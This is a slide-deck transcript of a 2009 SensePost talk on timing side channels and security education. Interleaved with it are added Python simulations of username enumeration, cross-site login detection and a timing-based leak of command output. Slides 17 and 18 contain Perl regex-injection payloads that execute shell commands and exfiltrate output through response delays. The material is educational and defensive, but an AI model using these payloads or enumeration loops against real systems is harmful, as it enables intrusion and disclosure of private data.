Page 1: On Timing and Teaching marco slaviero SensePost 2009

On Timing and Teaching

marco slaviero

SensePost 2009

Page 2:

Who we are: SensePost
Formed in 2001
Security assessment services to finance, industrial, mining, telecoms
Written a few papers
Spoken at a number of conferences
Contributed to a handful of books
Done some training

www.sensepost.com/blog

Page 3:

Agenda
Who we are
What this talk is about
Background
Timing vulnerabilities
Timing channels
Developers need our help
Conclusion / Questions

Page 4:

Main thrust
Message from users: there is a gap between what implementers know and what they face with respect to security
Industry is failing to address this
Universities are uniquely positioned to help
For fun, let's frame it with respect to timing attacks
  Received significant academic attention
  Allows for new demos :)

Page 5:

Stepping Back a Little
An illustrious history of side channel attacks on computing systems
  differential power analysis (hardware)
  EM radiation emission analysis (hardware)
  timing analysis (software/hardware)

Page 6:

Traditional Timing
Timing has received lots of attention over the years in the area of cryptanalysis
Kocher [1996]
  1st local results against RSA and DH
Brumley & Boneh [2003]
  Derived partial RSA key over the network due to weaknesses in OpenSSL
Bernstein [2004]
  Derived full AES key across custom network clients
Percival [2005]
  L1 cache access times could be used on HT processors to derive RSA key bits

Page 7:

Web Time
Felten & Schneider [2000]
  early results on timing and the web, focused on privacy
  browser cache snooping
  dns cache snooping
Grossman & Niedzialkowski [2006], SPI Dynamics [2006]
  Both released a JavaScript port scanner using JS's onerror feature
  Implicitly uses timing attacks (connection timed out, hence it is closed)
Bortz, Boneh & Nandy [2007]
  Direct timing (valid usernames, hidden gallery sizes)
  Cross Site Timing
  <img onerror=xxxxx>

Page 8:

All that research == solved, right?
In a perfect world, the pioneering work on timing would be reflected in today's systems

Page 9:

Making the jump
Username enumeration can be a significant issue
  *really* useful in certain circumstances
But what if the application returns a standard error page?

Page 10:

Happened last week…
Application could authenticate users itself (local DB) or against a configured AD
Local lookup is fast; AD lookup is across the network
A failed login for a local user returns before the AD round-trip, so response time alone separates valid local usernames from the rest even though the error page is identical
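The enumeration the slide describes, as an added example that is not from the deck: a constructed login routine with a fast local path and a simulated AD round-trip (4 ms sleep, an assumed value), an attacker loop that times several failed logins per name and compares medians against a calibration name that cannot exist, and a hardened variant that pays the directory cost unconditionally. The account names, delay and helper names are all assumptions for the illustration.

```python
"""Added example, not from the SensePost deck: timing-based username
enumeration against an application that authenticates local accounts from
its own DB and everyone else against a directory (AD) across the network.
The server, the accounts and the AD round-trip delay are all constructed."""
import statistics
import time

LOCAL_USERS = {"alice": "s3cret", "bob": "hunter2"}   # constructed local DB
AD_ROUNDTRIP = 0.004   # assumed ~4 ms network cost of an AD bind, simulated with sleep


def login(username, password):
    """Vulnerable stand-in: a local hit short-circuits, every other name pays
    the AD round-trip, yet both failures return the same generic error."""
    if username in LOCAL_USERS:
        return LOCAL_USERS[username] == password
    time.sleep(AD_ROUNDTRIP)          # simulated directory lookup
    return False


def login_hardened(username, password):
    """Hardened form: always pay the slow path so response time no longer
    depends on whether the name exists locally."""
    ok = username in LOCAL_USERS and LOCAL_USERS[username] == password
    time.sleep(AD_ROUNDTRIP)          # unconditional directory round-trip
    return ok


def time_login(auth, username, samples=7):
    """Median wall-clock seconds over `samples` failed logins; the median
    discards the odd slow outlier a single measurement would trip over."""
    timings = []
    for _ in range(samples):
        start = time.perf_counter()
        auth(username, "not-the-password")
        timings.append(time.perf_counter() - start)
    return statistics.median(timings)


def classify(timings, baseline, factor=2.0):
    """Pure decision rule: a name whose median is below baseline/factor
    skipped the network hop, so it exists locally."""
    return {name: ("local" if t * factor < baseline else "unknown")
            for name, t in timings.items()}


def enumerate_users(auth, candidates, samples=7):
    """Calibrate on a name that cannot exist, then classify each candidate."""
    baseline = time_login(auth, "no-such-user-7f3a9c", samples)
    timings = {name: time_login(auth, name, samples) for name in candidates}
    return classify(timings, baseline)


if __name__ == "__main__":
    names = ["alice", "mallory", "bob", "eve"]
    print("vulnerable:", enumerate_users(login, names))
    print("hardened:  ", enumerate_users(login_hardened, names))
```

Against a real application the same loop runs over HTTP; the calibration name and the median over repeated samples are what keep network jitter from producing false positives, and the hardened variant shows the cheapest fix: make every outcome pay the same cost, rather than trying to hide the error text.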

Page 11:

Page 13:

Timing and Privacy
JavaScript portscanning
Using CSS to determine if links were visited
Ed Felten in 2000 examined the dangers of Java and timing to users' privacy by timing load times
Felten's 2000 Timing Attack on Privacy

Page 14:

X.S.R.T
Cross Site Request Timing. Simply:
1. Victim visits attacker's website
2. JavaScript causes victim's browser to surf to http://www.facebook.com/friends.php?r
3. JavaScript determines load time, to decide if user is (or isn't) logged in (> 50ms: user logged in)

Problem: This doesn't work the same for U.S. victims and .ZA victims! (.za adds 100ms just by default!)

Page 15:

X.S.R.T
We introduced the concept of a base-page
1. Fetch a page available to both logged-in and logged-out users (base-page) (X seconds)
2. Fetch the page available only to logged-in users (Y seconds)
3. Calculate X/Y

This gives us a latency-resistant method of determining logged-in/logged-out status
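The two decision rules from the last two slides side by side, as an added example that is not from the deck: a constructed model of what the victim's browser would measure (assumed server costs of 10 ms for the base-page, 60 ms for the friends page when logged in, 5 ms for the anonymous redirect) for US and .za victims, with the absolute 50 ms threshold and the base-page ratio applied to each. Nothing here contacts a real site; the in-browser fetch and timing (image onerror/onload or XHR) is replaced by the model.

```python
"""Added example, not from the SensePost deck: the fixed ">50 ms means
logged in" rule from the XSRT slide against victims on different links,
compared with the base-page ratio. Server costs and latencies are assumed
values; nothing here talks to a real site."""

# Assumed server-side cost of each fetch, in milliseconds.
BASE_PAGE_MS = 10.0          # reachable logged in or out (the base-page)
PRIV_PAGE_MS = {True: 60.0,  # friends page rendered for a logged-in user
                False: 5.0}  # cheap redirect/error for an anonymous visitor


def load_time(page, logged_in, latency_ms):
    """Constructed model of what the victim's JavaScript would measure."""
    cost = BASE_PAGE_MS if page == "base" else PRIV_PAGE_MS[logged_in]
    return latency_ms + cost


def naive_rule(priv_ms, threshold_ms=50.0):
    """Slide 14: one fetch, absolute threshold."""
    return priv_ms > threshold_ms


def ratio_rule(base_ms, priv_ms, threshold=1.2):
    """Slide 15: fetch both pages and compare their ratio (written here as
    Y/X, privileged over base, so logged-in pushes the value above 1)."""
    return priv_ms / base_ms > threshold


def evaluate(victims):
    """For each (label, logged_in, latency_ms) return what both rules decide."""
    out = {}
    for label, logged_in, latency in victims:
        base = load_time("base", logged_in, latency)
        priv = load_time("priv", logged_in, latency)
        out[label] = {"truth": logged_in,
                      "naive": naive_rule(priv),
                      "ratio": ratio_rule(base, priv)}
    return out


# Constructed victims: the deck's US vs .za contrast (about +100 ms for .za).
VICTIMS = [("us-in", True, 10.0), ("us-out", False, 10.0),
           ("za-in", True, 110.0), ("za-out", False, 110.0)]


def rule_accuracy(rule, victims=VICTIMS):
    """Fraction of victims the named rule ("naive" or "ratio") classifies correctly."""
    results = evaluate(victims)
    return sum(r[rule] == r["truth"] for r in results.values()) / len(results)


if __name__ == "__main__":
    for label, r in evaluate(VICTIMS).items():
        print(label, r)
    print("naive:", rule_accuracy("naive"), "ratio:", rule_accuracy("ratio"))
```

The absolute rule flags every .za visitor as logged in because the link alone exceeds 50 ms; the ratio rule gets all four right. Note that the ratio shrinks toward 1 as latency dominates (about 1.4 for the .za logged-in case against 3.5 for the US one), so on slow links the attacker wants several samples and a median rather than one fetch of each page.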

Page 16:

So serious?
C'mon, those are binary decisions, where's the real harm? It's inference only. (Apart from SPAMmer mining)
They were timing *vulnerabilities*
What about using timing as a channel?

Page 17:

Web app provides an interface
A "secure" box from a network hardening point of view
Only a single search page exposed

  use re 'eval';   # needed for (?{ }) in a runtime-interpolated pattern; without it Perl refuses the injection
  $search_term = $user_input;
  if ($recordset =~ /$search_term/ig) {
      do_stuff();
  }

Page 18:

Perl timing
Regex injection:
  (?{`uname`;})
We can also make execution pause:
  (?{`sleep 20`;})
Now vary the pause and infer data:
  (?{`perl -e 'sleep(ord(substr(qx/uname/, 0,1)))'`;})
Finally, pause in one branch of a conditional and extract a bit at a time (max 8*pause):
  (?{`perl -e 'sleep(substr((unpack('B32',pack('N',ord(substr(qx/ls/, 0, 1))))), 24,1) * 2)'`;})
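The bit-at-a-time channel behind the last payload, as an added example that is not from the deck, modelled in Python so it runs offline: the injected `(?{ })` block is represented by a callback that the stand-in search page invokes during matching, the command output it reads is a constructed constant, and the pause per set bit is scaled down from the deck's 2 s. The attacker side sends eight timed requests per byte (offsets 24..31 of the `B32` string, i.e. the byte's bits from most to least significant), decodes each from the response time, and the budget helper restates the slide's max 8*pause against the 255*pause worst case of the earlier `sleep(ord(...))` payload. Names and values are assumptions for the illustration.

```python
"""Added example, not from the SensePost deck: the bit-at-a-time timing
channel behind the last Perl payload on slide 18, modelled in Python so it
runs offline. The injected (?{ }) code block is represented by a callback the
"search page" invokes during matching; the command output it reads is a
constructed constant, and the per-bit pause is scaled down from the deck's 2 s."""
import time

COMMAND_OUTPUT = b"Linux\n"   # constructed stand-in for the output of `uname`/`ls`
PAUSE = 0.003                 # seconds slept per set bit (the deck used 2 s)


def vulnerable_search(injected):
    """Stand-in for the Perl search page: matching runs the injected code,
    which can read command output, but the HTTP response reveals nothing."""
    injected(COMMAND_OUTPUT)
    return "no results found"


def bit_payload(pos, bit):
    """Equivalent of
    sleep(substr(unpack('B32', pack('N', ord(substr($out, pos, 1)))), 24 + bit, 1) * PAUSE):
    pack('N') yields 32 big-endian bits, positions 24..31 are the byte itself,
    so bit 0 here is the most significant bit of the byte at `pos`."""
    def run(output):
        if (output[pos] >> (7 - bit)) & 1:
            time.sleep(PAUSE)          # the conditional branch that pauses
    return run


def timed_request(injected):
    """What the attacker observes: wall-clock time of one search request."""
    start = time.perf_counter()
    vulnerable_search(injected)
    return time.perf_counter() - start


def leak_byte(pos):
    """Eight requests, one per bit; a response slower than half the pause
    means the conditional branch slept, i.e. the bit was set."""
    value = 0
    for bit in range(8):
        elapsed = timed_request(bit_payload(pos, bit))
        value = (value << 1) | int(elapsed > PAUSE / 2)
    return value


def leak(length):
    """Recover `length` bytes of the command output through timing alone."""
    return bytes(leak_byte(pos) for pos in range(length))


def worst_case_seconds(length, pause=PAUSE):
    """Budget check from the slide: at most 8*pause per byte with the bitwise
    payload, versus up to 255*pause per byte for sleep(ord(char))."""
    return {"bitwise": 8 * pause * length, "sleep_ord": 255 * pause * length}


if __name__ == "__main__":
    print(leak(len(COMMAND_OUTPUT)))
    print(worst_case_seconds(len(COMMAND_OUTPUT), pause=2.0))
```

Over a real network the pause has to exceed the jitter of the link (hence the deck's 2 s), and the decode threshold of half a pause is what makes a single slow packet harmless; the budget helper makes the trade-off concrete: 16 s per byte for the bitwise payload at 2 s per bit, against up to 510 s for a single `sleep(ord(char))`.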

Page 19:

So, for all the research, we still find timing issues and can communicate over timing channels
(Of course, this IS NOT limited to timing work)

Page 20:

Feel the application development pain (architect on down)
Not exposed to security thinking in formative years
Devs struggling to bolt on the knowledge
Battling to counteract the latest exploit
Always one step behind
Fundamental knowledge clearly available in academic circles

Page 21:

Why are devs hurting so much?
Deficient dev lifecycle
  Security testing != secure software
Inadequate design
  Crypto
  Data flow
Knowledge
  Spot the bug
  Fixing takes clue
  Crypto != basic knowledge
Security fail

Page 22:

Where security education should occur
Premise:
  We depend on well-written programs
  Security is fundamental to well-written programs
  Not equivalent to learning libraries or frameworks
I argue:
  Industry has failed at this
  As important as compilers / graphics / AI
  Undergraduate level
  Defensive thinking techniques
  Practical examples help, but the goal is NOT to train hackers or push exploits

Page 23:

Prioritised wishlist for undergrads
1. Secure coding techniques
  Never trusting user input
  Exposure to common attack vectors
  Realising the power of the return code
2. Threat modeling (attack trees etc.)
  Powerful pen-and-paper technique for exposing design flaws
3. Destructive testing
  Reward resilient applications
4. SDLC modifications
  For the software engineers, realisation that a sole security check before deployment is like reading a manual on the Waltz on the morning of your wedding
5. Security libraries
  Introduction to common libs

Page 24:

How can we help?
Have a fair idea of what's going wrong
Improving security education could be a joint effort
Your expertise is in security theory, education, curriculum development etc.
We (industry) break systems, giving current, relevant insight
Contact us with ideas (we have a few of our own)

Page 25:

Conclusion
Timing attacks received much academic attention
We still find them day-to-day; something is missing
Security not core to developer education
Include security in undergrad!
Really, talk to us, we want to get involved.

Page 26:

Questions ???

[email protected]/blog